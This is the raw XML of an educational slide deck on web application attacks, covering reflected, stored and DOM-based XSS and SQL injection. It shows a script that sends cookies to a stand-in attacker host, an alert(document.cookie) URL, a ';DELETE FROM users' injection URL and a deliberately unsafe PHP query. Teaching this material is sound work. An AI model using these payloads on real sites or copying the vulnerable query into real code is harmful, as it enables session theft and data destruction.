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0" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="262" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="263" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="289" r:id="rId18"/>
    <p:sldId id="29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1" r:id="rId32"/>
    <p:sldId id="295" r:id="rId33"/>
    <p:sldId id="294" r:id="rId34"/>
    <p:sldId id="296" r:id="rId35"/>
    <p:sldId id="297" r:id="rId36"/>
    <p:sldId id="298" r:id="rId37"/>
    <p:sldId id="30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167" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="116" d="100"/>
          <a:sy n="116" d="100"/>
        </p:scale>
        <p:origin x="-14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2BB7F96-6521-464C-8AF5-63B63742C0F9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/13/15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9F28027-309B-497F-A9D7-367BAA30751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9F28027-309B-497F-A9D7-367BAA30751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9F28027-309B-497F-A9D7-367BAA3075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9F28027-309B-497F-A9D7-367BAA307514}"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9F28027-309B-497F-A9D7-367BAA307514}"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9F28027-309B-497F-A9D7-367BAA307514}"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9F28027-309B-497F-A9D7-367BAA30751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9F28027-309B-497F-A9D7-367BAA307514}"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2BB7F96-6521-464C-8AF5-63B63742C0F9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/13/15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9F28027-309B-497F-A9D7-367BAA30751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2BB7F96-6521-464C-8AF5-63B63742C0F9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/13/15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9F28027-309B-497F-A9D7-367BAA30751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2BB7F96-6521-464C-8AF5-63B63742C0F9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/13/15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9F28027-309B-497F-A9D7-367BAA307514}"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2BB7F96-6521-464C-8AF5-63B63742C0F9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>1/13/15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9F28027-309B-497F-A9D7-367BAA30751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50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Andalus"/>
              </a:rPr>
              <a:t>WEB APPLICATION ATTACKS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="Andalus"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" smtClean="0"/>
              <a:t>by Hari Ruthala</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="304800"/>
            <a:ext cx="5791200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="381000"/>
            <a:ext cx="7391400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These slides were copied from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>slideshare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.slideshare.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hruth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/web-application-attacks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Non-persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Persistent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM Based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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Type of XSS attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>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Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Non-persistent XSS   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>also called as Reflected Xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>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endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>In persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible blog websites, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;SCRIPT&gt; document.location= 'http://attackerhost.example/cgi- bin/cookiesteal.cgi?'+document.cookie &lt;/SCRIPT&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Persistent XSS    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>also called as stored  Xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>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462272"/>
          </a:xfrm>
          <a:ln>
            <a:tailEnd type="arrow"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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Persistent XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flowchart: Magnetic Disk 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="1600200"/>
            <a:ext cx="838200" cy="609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DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="3276600"/>
            <a:ext cx="3352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Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="5105400"/>
            <a:ext cx="1828800" cy="685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Hacker’s Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2438400" y="4267200"/>
            <a:ext cx="1143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3200400" y="2514600"/>
            <a:ext cx="1143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7200" y="3962400"/>
            <a:ext cx="2362200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http request with XSS JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="2362200"/>
            <a:ext cx="2286000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server saves XSS code to DB</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rounded Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="5181600"/>
            <a:ext cx="19050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Normal User Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="3733800"/>
            <a:ext cx="1676400" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http response with XSS JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Arrow Connector 38"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4991100" y="4305300"/>
            <a:ext cx="1219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V="1">
            <a:off x="4229100" y="2552700"/>
            <a:ext cx="1219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648200" y="2286000"/>
            <a:ext cx="11430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rot="16200000" flipH="1">
            <a:off x="6057900" y="4076700"/>
            <a:ext cx="1219200" cy="990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Persistent XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="f3.PNG"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1962835"/>
            <a:ext cx="8229600" cy="3562568"/>
          </a:xfr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47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;HTML&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;TITLE&gt;Welcome!&lt;/TITLE&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;SCRIPT&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>var pos= document.URL.indexOf("name=")+5;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>document.write(document.URL.substring(pos,document.URL.length));</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/SCRIPT&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;BR&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Welcome to our system</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Normally, this HTML page would be used for welcoming the user, e.g.:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  http://www.vulnerable.site/welcome.html?name=Joe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, a request such as below will result in XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  http://www.vulnerable.site/welcome.html?name=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  &lt;script&gt;alert(document.cookie)&lt;/script&gt;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DOM based XSS attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-7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The ability to inject SQL commands in to database engine through an existing application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>SQL Injection is a vulnerability which exists on the server side and poses a risk to the Database server of the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r">
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>Gain access to restricted areas without proper credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r">
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r">
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>Insert/Delete data to the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r">
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r">
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" smtClean="0"/>
              <a:t>Steal private information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"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a:rPr>
              <a:t>What is SQL Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalu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25963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>http://example.com/db.php?id=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>http://example.com/db.php?id=0;DELETE%20FROM%20users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>$id= $_GET[ 'id' ] ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>         //$id = 0;DELETE FROM users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>$result = mysql_query("SELECT * FROM users WHERE id={$id}");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="685800"/>
            <a:ext cx="6019800" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
